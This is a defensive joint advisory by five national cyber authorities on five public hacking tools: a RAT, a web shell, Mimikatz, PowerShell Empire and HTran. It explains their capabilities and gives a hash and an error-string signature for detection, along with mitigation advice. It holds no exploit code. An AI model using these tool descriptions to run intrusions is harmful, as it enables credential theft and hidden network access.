Joint report on publicly available hacking tools

Alternate format: Joint report on publicly available hacking tools (PDF, 865.16 KB)

Limiting the effectiveness of tools commonly used by malicious actors

Introduction

This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the UK and USAFootnote 1.

In it we highlight the use of five publicly-available tools, which have been used for malicious purposes in recent cyber incidents around the world.

To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network.

Table of contents

Nature of the tools

The individual tools we cover in this report are limited examples of the types used by malicious actors. You should not consider it an exhaustive list when planning your network defence.

Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states, or criminals on the Dark Web. Today, hacking tools with a variety of functions are widely and freely available, for use by everyone from skilled penetration testers, hostile state actors and organised criminals, through to amateur hackers.

These tools have been used to compromise information across a wide range of critical sectors, including health, finance, government and defence. Their widespread availability presents a challenge for network defence and actor attribution.

Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated groups use common, publicly-available tools to achieve their objectives.

Whatever these objectives may be, initial compromises of victim systems are often established through exploitation of common security weaknesses. Abuse of unpatched software vulnerabilities or poorly configured systems are common ways for an actor to gain access. The tools detailed here come into play once a compromise has been achieved, enabling attackers to further their objectives within the victim’s systems.

Report structure

The tools detailed fall into five categories: Remote Access Trojans (RATs), Web Shells, Credential Stealers, Lateral Movement Frameworks, and Command and Control (C2) Obfuscators.

The report provides an overview of the threat posed by each tool, along with insight into where and when it has been deployed by hostile actors. Measures to aid detection and limit the effectiveness of each tool are also described.

The report concludes with general advice for improving network defence practices.

 

Remote access trojans: JBiFrost

First observed in May 2015, the JBiFrost Remote Access Trojan (RAT) is a variant of the Adwind RAT, with roots stretching back to the Frutas RAT, from 2012.

A RAT is a programme which, once installed on a victim’s machine, allows remote administrative control. In a malicious context it can, among many other functions, be used to install backdoors and key loggers, take screen shots, and exfiltrate data.

Malicious RATs can be difficult to detect because they are normally designed not to appear in lists of running programmes and can mimic the behaviour of legitimate applications.

To prevent forensic analysis, RATs have been known to disable security measures, such as Task Manager, and network analysis tools, such as Wireshark, on the victim's system.

In use

JBiFrost is typically employed by cyber criminals and low-skilled actors, but its capabilities could easily be adapted for use by state actors.

Other RATs are widely used by Advanced Persistent Threat (APT) groups, such as Adwind against the aerospace and defence sector, or Quasar RAT by APT10, against a broad range of sectors.

Malicious actors have also compromised servers with the purpose of delivering malicious RATs to victims, either to gain remote access for further exploitation, or to steal valuable information, such as banking credentials, Intellectual Property or PII.

Capabilities

The JBiFrost RAT is Java-based, cross-platform and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, MAC OS X and Android.

JBiFrost allows actors to pivot and move laterally across a network, or install additional malicious software. It is primarily delivered through emails as an attachment: usually an invoice notice; request for quotation; remittance notice; shipment notification; payment notice; or with a link to a file hosting service.

Past infections have exfiltrated intellectual property, banking credentials and Personally Identifiable Information (PII). Machines infected with JBiFrost can also be used in botnets to carry out Distributed Denial of Service (DDoS) attacks.

Examples

Since early 2018, we have observed an increase in JBiFrost being used in targeted attacks against critical national infrastructure owners and their supply chain operators. There has also been an increase in the RAT’s hosting on infrastructure located in our countries.

In early 2017, the Adwind RAT was deployed via spoofed emails, designed to look as if they originated from SWIFT network services.

Many other publicly available RATs, including variations of the Gh0st RAT, have also been observed in use against a range of victims worldwide.

Detection and protection

Some possible indications of a JBiFrost RAT infection can include, but are not limited to:

  • Inability to restart the computer in safe mode;
  • Inability to open the Windows registry editor or task manager;
  • Significant increase in disk activity and/or network traffic;
  • Connection attempts to known malicious IP addresses; and
  • Creation of new files and directories with obfuscated or random names.

Protection is best afforded by ensuring systems and installed applications are all fully patched and updated. The use of a modern antivirus program with automatic definition updates and regular system scans will also help ensure that most of the latest variants are stopped in their tracks. You should ensure that your organisation is able to collect antivirus detections centrally across its estate and investigate RAT detections efficiently.

Strict application whitelisting is recommended to prevent infections occurring.

The initial infection mechanism for RATs, including JBiFrost, can be via phishing emails. You can help prevent JBiFrost infections by stopping these phishing emails from reaching your users, helping users to identify and report phishing emails, and implementing security controls so that the malicious email doesn’t compromise your devices. For further details, see the NCSC's phishing guidanceFootnote 2.

 

Web shells: China chopper

China Chopper is a publicly available, well-documented web shell, in widespread use since 2012.

Web shells are malicious scripts which are uploaded to a target host after an initial compromise and grant an actor remote administrative capability.

Once this access is established, web shells can also be used to pivot to further hosts within a network.

In use

The China Chopper web shell is extensively used by hostile actors to remotely access compromised web-servers, where it provides file and directory management, along with access to a virtual terminal on the compromised device.

As China Chopper is just 4 Kb in size, and has an easily modifiable payload, detection and mitigation is difficult for network defenders.

Capabilities

The China Chopper web shell has two main components: the China Chopper client, which is run by the attacker, and the China Chopper server, which is installed on the victim web server but is also attacker-controlled.

The web shell client can issue terminal commands and manage files on the victim server. Its MD5 hash is publicly availableFootnote 3.

Web Shell Client MD5 Hash
caidao.exe 5001ef50c7e869253a7c152a638eab8a
 

The web shell server is uploaded in plain text and can easily be changed by the attacker. This makes it is hard to define a specific hash that can identify adversary activity.

In summer 2018, threat actors were observed targeting public-facing web servers vulnerable to CVE-2017-3066. The activity was related to a vulnerability in the web application development platform Adobe ColdFusion, which enabled remote code execution. China Chopper was intended as the second-stage payload, delivered once servers had been compromised, allowing the attacker remote access to the victim host.

After successful exploitation of a vulnerability on the victim machine, the text-based China Chopper is placed on the victim web server. Once uploaded, the web shell server can be accessed by the attacker at any time, using the client application. Once successfully connected, the attacker proceeds to manipulate files and data on the web server.

Capabilities include uploading and downloading files to and from the victim, using the file-retrieval tool 'wget' to download files from the internet to the target, and editing, deleting, copying, renaming, and even changing the timestamp of existing files.

Detection and protection

The most powerful defence against a web shell is to avoid the web server being compromised in the first place. Ensure that all the software running on public facing web servers is up to date, with security patches applied. Audit custom applications for common web vulnerabilitiesFootnote 4.

One attribute of China Chopper is that every action generates an HTTP POST. This can be noisy and easily spotted if investigated by a network defender.

While the China Chopper web shell server upload is plain text, commands issued by the client are Base64 encoded, although this is easily decodable.

The adoption of Transport Layer Security (TLS) by web servers has resulted in web server traffic becoming encrypted, making detection of China Chopper activity using network-based tools more challenging.

The most effective way to detect and mitigate China Chopper is on the host itself (specifically on public-facing web servers). There are simple ways to search for the presence of the web shell using the command line on both Linux and Windows based operating systemsFootnote 5.

To detect web shells more broadly, network defenders should focus on spotting either suspicious process execution on web servers (for example PHP binaries spawning processes), or out of pattern outbound network connections from web servers. Typically, web servers make predictable connections to an internal network. Changes in those patterns may indicate the presence of a web shell. You can manage network permissions to prevent web-server processes from writing to directories where PHP can be executed, or from modifying existing files.

We also recommend that you use web access logs as a source of monitoring, for example through traffic analytics. Observing new unexpected pages or changes in traffic patterns can act as an early indicator.

 

Credential stealers: Mimikatz

Developed in 2007, Mimikatz is mainly used by attackers to collect the credentials of other users logged in to a targeted Windows machine. It does this by accessing the credentials in memory, within a Windows process called Local Security Authority Subsystem Service (LSASS).

These credentials, either plain text, or in hashed form, can be reused to give access to other machines on a network.

Although it was not originally intended as a hacking tool, in recent years Mimikatz has been used by multiple actors for malicious purposes. Its use in compromises around the world has prompted organisations globally to re-evaluate their network defences.

Mimikatz is typically used by malicious actors once access has been gained to a host and the actor wishes to move throughout the internal network. Its use can significantly undermine poorly configured network security.

In use

Mimikatz source code is publicly available, which means anyone can compile their own versions of the tool and potentially develop new custom plug-ins and additional functionality.

Our cyber authorities have observed widespread use of Mimikatz among hostile actors, including organised crime and state-sponsored groups.

Once a malicious actor has gained local admin privileges on a host, Mimikatz provides the ability to obtain the hashes and clear-text credentials of other users, enabling the actor to escalate privileges within a domain and perform many other post-exploitation and lateral movement tasks.

For this reason, Mimikatz has been bundled into other penetration testing and exploitation suites, such as PowerShell Empire and Metasploit.

Capabilities

Mimikatz is best known for its ability to retrieve clear text credentials and hashes from memory, but its full suite of capabilities is extensive.

The tool can obtain LAN Manager and NTLM hashes, certificates, and long-term keys on Windows XP (2003) through to Windows 8.1 (2012 R2). In addition, it can perform pass-the-hash or pass-the-ticket tasks and build Kerberos Golden Tickets.

Many features of Mimikatz can be automated with scripts, such as PowerShell, allowing an actor to rapidly exploit and traverse a compromised network. Furthermore, when operating in memory through the freely available, yet powerful, 'Invoke-Mimikatz' PowerShell script, Mimikatz activity is very difficult to isolate and identify.

Examples

Mimikatz has been used across multiple incidents by a broad range of actors for several years. In 2011 it was used by unknown hackers to obtain administrator credentials from the Dutch certificate authority, DigiNotar. The rapid loss of trust in DigiNotar led to the company filing for bankruptcy within a month of this compromise.

More recently, Mimikatz was used in conjunction with other hacking tools in the 2017 NotPetya and BadRabbit ransomware attacks to extract administrator credentials held on thousands of computers. These credentials were used to facilitate lateral movement and enabled the ransomware to propagate throughout networks, encrypting the hard drives of numerous systems where these credentials were valid.

In addition, a Microsoft research team identified use of the tool during a sophisticated cyber-attack targeting several high-profile technology and financial organisations. In combination with several other tools and exploited vulnerabilities, Mimikatz was used to dump and likely reuse system hashes.

Detection and protection

Updating Windows will help reduce the information available to an actor from the Mimikatz tool, as Microsoft seeks to improve the protection offered in each new Windows version.

To prevent Mimikatz credential retrieval, defenders should disable the storage of clear text passwords in LSASS memory. This is default behaviour for Windows 8.1/Server 2012 R2 and later but can be specified on older systems which have the relevant security patches installedFootnote 6. Windows 10 and Windows Server 2016 systems can be protected by using newer security features such as Credential Guard.

Credential Guard will be enabled by default if:

  • The hardware meets Microsoft’s Windows Hardware Compatibility Programme Specifications and, Policies for Windows Server 2016 and Windows Server Semi-Annual Branch; and
  • The server is not acting as a Domain Controller.

You should verify that your physical and virtualised servers meet Microsoft’s minimum requirements for each release of Windows 10 and Windows ServerFootnote 7.

Password reuse across accounts, particularly administrator accounts, makes pass-the-hash attacks far simpler. You should set user policies within your organisation which discourage password reuse, even across common level accounts on a network.

The freely available Local Admin Password Solution (LAPS) from Microsoft can allow easy management of local admin passwords, preventing the need to set and store passwords manually.

Network administrators should monitor and respond to unusual or unauthorised account creation or authentication, to prevent Golden Ticket exploitation or network persistence and lateral movement. For Windows, tools such as Microsoft ATA and Azure ATP can help with this.

Network administrators should ensure that systems are patched and up to date. Numerous Mimikatz features are mitigated, or significantly restricted, by the latest system versions and updates. But no update is a perfect fix, as Mimikatz is continually evolving and new third party modules are often developed.

Most up-to-date antivirus tools will detect and isolate non-customised Mimikatz use and should therefore be in use to detect these instances. But hostile actors can sometimes circumvent antivirus systems by running the tool in memory, or by slightly modifying the original code of the tool. Wherever Mimikatz is detected, you should perform a rigorous investigation, as it almost certainly indicates an actor actively present in the network, rather than an automated process at work.

Several features of Mimikatz rely on exploitation of administrator accounts. Therefore, you should ensure that administrator accounts are issued on an as-required basis only. Where administrative access is required, you should apply Privilege Access Management principles.

Since Mimikatz can only capture the accounts of those logged into a compromised machine, privileged users (such as domain admins) should avoid logging into machines with their privileged credentials. Detailed information on securing Active Directory is available from MicrosoftFootnote 8.

Network defenders should audit the use of scripts, particularly PowerShell, and inspect logs to identify anomalies. This will aid identification of Mimikatz or pass-the-hash abuse, as well as providing some mitigation against attempts to bypass detection software.

 

Lateral movement frameworks: PowerShell empire

PowerShell Empire is an example of a post exploitation or lateral movement tool. It is designed to allow an attacker (or penetration tester) to move around a network after gaining initial access. Other examples of these tools include Cobalt Strike and Metasploit. Empire can also be used to generate malicious documents and executables for social engineering access to networks.

The PowerShell Empire framework (Empire) was designed as a legitimate penetration testing tool in 2015. Empire acts as a framework for continued exploitation once an attacker has gained access to a system.

The tool provides an attacker with the ability to escalate privileges, harvest credentials, exfiltrate information and move laterally across a network. These capabilities make it a powerful exploitation tool. Because it is built on a common, legitimate application (PowerShell) and can operate almost entirely in memory, Empire can be difficult to detect on a network using traditional antivirus tools.

In use

PowerShell Empire has become increasingly popular among hostile state actors and organised criminals. In recent years we have seen it used in cyber incidents globally across a wide range of sectors.

Initial exploitation methods vary between compromises, and actors can configure the Empire Framework uniquely for each scenario and target.

This, in combination with the wide range of skill and intent within the Empire user community, means that ease of detection will vary. Nonetheless, having a greater understanding and awareness of this tool is a step forward in defending against its use by malicious actors.

Capabilities

Empire enables an attacker to carry out a range of actions on a victim’s machine and implements the ability to run PowerShell scripts without needing ‘powershell.exe’ to be present on the system. Its communications are encrypted and its architecture flexible.

Empire uses ‘modules’ to perform more specific, malicious actions. These provide attackers with a customisable range of options to pursue their goals on the victim's systems. These include escalation of privileges, credential harvesting, host enumeration, key-logging and the ability to move laterally across a network.

Empire’s ease of use, flexible configuration and ability to evade detection make it a popular choice for actors of varying abilities.

Examples

During an incident in February 2018, a UK energy sector company was compromised by an unknown actor. This compromise was detected through Empire’s beaconing activity, using the tool's default profile settings. Weak credentials on one of the victim’s administrator accounts are believed to have provided the actor with initial access to the network.

In early 2018, an unknown actor used Winter Olympics themed socially engineered emails and malicious attachments in a spear phishing campaign targeting several South Korean organisations. This attack had an additional layer of sophistication, making use of Invoke-PSImage, a tool that will encode any PowerShell script into an image.

In December 2017, the hostile actor APT19 targeted a multinational law firm with a targeted phishing campaign. APT19 used obfuscated PowerShell macros embedded within Word documents generated by Empire.

Our cyber security authorities are also aware of Empire being used to target academia. In one reported instance, an actor attempted to use Empire to gain persistence using a Windows Management Instrumentation (WMI) event consumer. However, in this instance the Empire agent was unsuccessful in establishing network connections due to the HTTP connections being blocked by a local security appliance.

Detection and protection

Identifying malicious PowerShell activity can be difficult, due to the prevalence of legitimate PowerShell on hosts and its increased use in maintaining a corporate environment.

To identify potentially malicious scripts, PowerShell activity should be comprehensively logged. This should include script block logging and PowerShell transcripts.

Older versions of PowerShell should be removed from environments to ensure that they cannot be used to circumvent additional logging and controls added in more recent versions of PowerShell. The Digital Shadows blogFootnote 9 provides a good summary of PowerShell security practices.

The code integrity features in recent versions of Windows can be used to limit the functionality of PowerShell, preventing or hampering malicious PowerShell in the event of a successful intrusion.

A combination of script code signing, application whitelisting and constrained language mode will prevent or limit the effect of malicious PowerShell in the event of a successful intrusion. These controls will also impact legitimate scripts and it is strongly advised that they be thoroughly tested before deployment.

When organisations profile their PowerShell usage, they often find it is only used legitimately by a small number of technical staff. Establishing the extent of this legitimate activity will make it easier to monitor and investigate suspicious or unexpected PowerShell usage elsewhere on the network.

C2 obfuscation tools: HTran

Attackers will often want to disguise their location when compromising a target. To do this, they may use generic privacy tools such as TOR, or more specific tools to obfuscate their location.

HUC Packet Transmitter (HTran) is a proxy tool, used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker's communications with victim networks. The tool has been freely available on the internet since at least 2009.

HTran facilitates TCP connections between the victim and a hop point controlled by an attacker. Malicious cyber actors can use this technique to redirect their packets through multiple compromised hosts running HTran, to gain greater access to hosts in a network.

In use

The use of HTran has been regularly observed in compromises of both government and industry targets.

A broad range of cyber actors have been observed using HTran and other connection proxy tools to:

  • Evade intrusion and detection systems on a network;
  • Blend in with common traffic or leverage domain trust relationships to bypass security controls;
  • Obfuscate or hide C2 infrastructure or communications; and
  • Create peer-to-peer or meshed C2 infrastructure to evade detection and provide resilient connections to infrastructure.

Capabilities

HTran can run in several modes, each of which forwards traffic across a network by bridging two TCP sockets. They differ in terms of where the TCP sockets are initiated from, either locally or remotely. The three modes are:

  • Server (listen) – Both TCP sockets initiated remotely;
  • Client (slave) – Both TCP sockets initiated locally; and
  • Proxy (tran) – One TCP socket initiated remotely, the other initiated locally, upon receipt of traffic from the first connection.

HTran can inject itself into running processes and install a rootkit to hide network connections from the host operating system. Using these features also creates Windows registry entries to ensure that HTran maintains persistent access to the victim network.

Examples

Recent investigations by our cyber security authorities have identified the use of HTran to maintain and obfuscate remote access to targeted environments.

In one incident, the attacker compromised externally facing web servers running outdated and vulnerable web applications. This access enabled the upload of web shells, which were then used to deploy other tools, including HTran.

HTran was installed into the ProgramData directory and other deployed tools were used to reconfigure the server to accept Remote Desktop Protocol (RDP) communications.

The actor issued a command to start HTran as a client, initiating a connection to a server located on the internet over port 80, which forwards RDP traffic from the local interface.

In this case, HTTP was chosen to blend in with other traffic that was expected to be seen originating from a web server to the internet. Other well-known ports used included:

  • Port 53 - DNS;
  • Port 443 - HTTP over TLS/SSL; and
  • Port 3306 - MySQL

By using HTran in this way, the actor was able to use RDP for several months without being detected.

Detection and protection

Attackers need access to a machine to install and run HTran, so network defenders should apply security patches and use good access control to prevent attackers installing malicious applications.

Network monitoringFootnote 10 and firewalls can help prevent and detect unauthorised connections from tools such as HTran.

In some of the samples analysed, the rootkit component of HTran only hides connection details when the proxy mode is used. When client mode is used, defenders can view details about the TCP connections being made.

HTran also includes a debugging condition that is useful for network defenders. In the event that a destination becomes unavailable, HTran generates an error message using the following format:

sprint(buffer, “[SERVER]connection to %s:%d error\r\n”, host, port2);

This error message is relayed to the connecting client in the clear. Defenders can monitor for this error message to potentially detect HTran instances active in their environments.

 

General detection and prevention measures

There are several measures that will improve the overall cyber security of your organisation and help protect it against the types of tools highlighted by this report. Network defenders are advised to seek further information using the links below.

CCCS Top 10 Security Actions

CCCS Cyber hygiene

Cyber Security Concerns for Management:
Cyber security considerations for management - Guidance for the Government of Canada (ITSB-67) (Effective June 15, 2022 all COMSEC forms will only be available through the COMSEC User Portal (CUP).)

Use multi-factor authentication (/2-factor authentication/two-step authentication) to reduce the impact of password compromises. See CCCS guidance: User authentication guidance for information technology systems (ITSP.30.031 v3)

Protect your devices and networks by keeping them up to date: use the latest supported versions, apply security patches promptly, use antivirus and scan regularly to guard against known malware threats. See CCCS Guidance: Security vulnerabilities and patches explained - IT security bulletin for the Government of Canada (ITSB-96)

Network security zoning - Design considerations for placement of services within zones (ITSG-38).

Protect the management interfaces of your critical operational systems. In particular, use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets.

Set up a security monitoring capability so you are collecting the data that will be needed to analyse network intrusions.

Update your systems and software. Ensure your operating system and productivity apps are up to date. Users with Office 365 licensing can use 'click to run' to keep their office applications seamlessly updated.

Use modern systems and software. These have better security built-in.

Restrict intruders' ability to move freely around your systems and networks. Pay particular attention to potentially vulnerable entry points eg third-party systems with onward access to your core network. During an incident, disable remote access from third-party systems until you are sure they are clean. See CCCS Guidance: Cyber Security Best Practices: Contracting With Managed Service Providers (Effective June 15, 2022 all COMSEC forms will only be available through the COMSEC User Portal (CUP).)

Whitelist applications. If supported by your operating environment, consider whitelisting of permitted applications. This will help prevent malicious applications from running. See CCCS Guidance: Cyber Security Best Practices: Contracting With Managed Service Providers (Effective June 15, 2022 all COMSEC forms will only be available through the COMSEC User Portal (CUP).)

Manage macros carefully: disable Office macros except in the specific apps where they are required, only enable macros for users that need them day-to-day, use a recent and fully patched version of Office and the underlying platform.

Use antivirus. Keep any antivirus software up to date, and consider use of a cloud-backed antivirus product that can benefit from the economies of scale this brings. Ensure that it is also capable of scanning MS Office macros. See CCCS Guidance:

Layer phishing defences. Detect and quarantine as many malicious email attachments and spam as possible, before they reach your end users. Multiple layers of defence will greatly cut the chances of a compromise.

Treat people as your first line of defence. Tell staff how to report suspected phishing emails, and ensure they feel confident to do so. Investigate their reports promptly and thoroughly. Never punish users for clicking phishing links or opening attachments. See CCCS Guidance: Spotting malicious email messages (ITSAP.00.100)

Deploy a host-based intrusion detection system. A variety of products are available, free and paid-for, to suit different needs and budgets.

Defend your systems and networks against denial of service attacks. See CCCS Guidance: https://www.publicsafety.gc.ca/cnt/rsrcs/cybr-ctr/2012/tr12-001-en.aspx

Defend your organisation from ransomware. Keep safe backups of important files, protect from malware and don’t pay the ransom – it may not get your data back. See CCCS Guidance: https://www.publicsafety.gc.ca/cnt/rsrcs/cybr-ctr/2013/in13-004-en.aspx

Make sure you are handling personal data appropriately and securely. See Privacy Commissioner guidance: https://www.priv.gc.ca/en/privacy-topics/privacy-laws-in-canada/the-personal-information-protection-and-electronic-documents-act-pipeda/

Other publications from CCCS

See also the following advice from our international partners:

Report a problem on this page
Please select all that apply:

Thank you for your help!

You will not receive a reply. For enquiries, please contact us.

Date modified: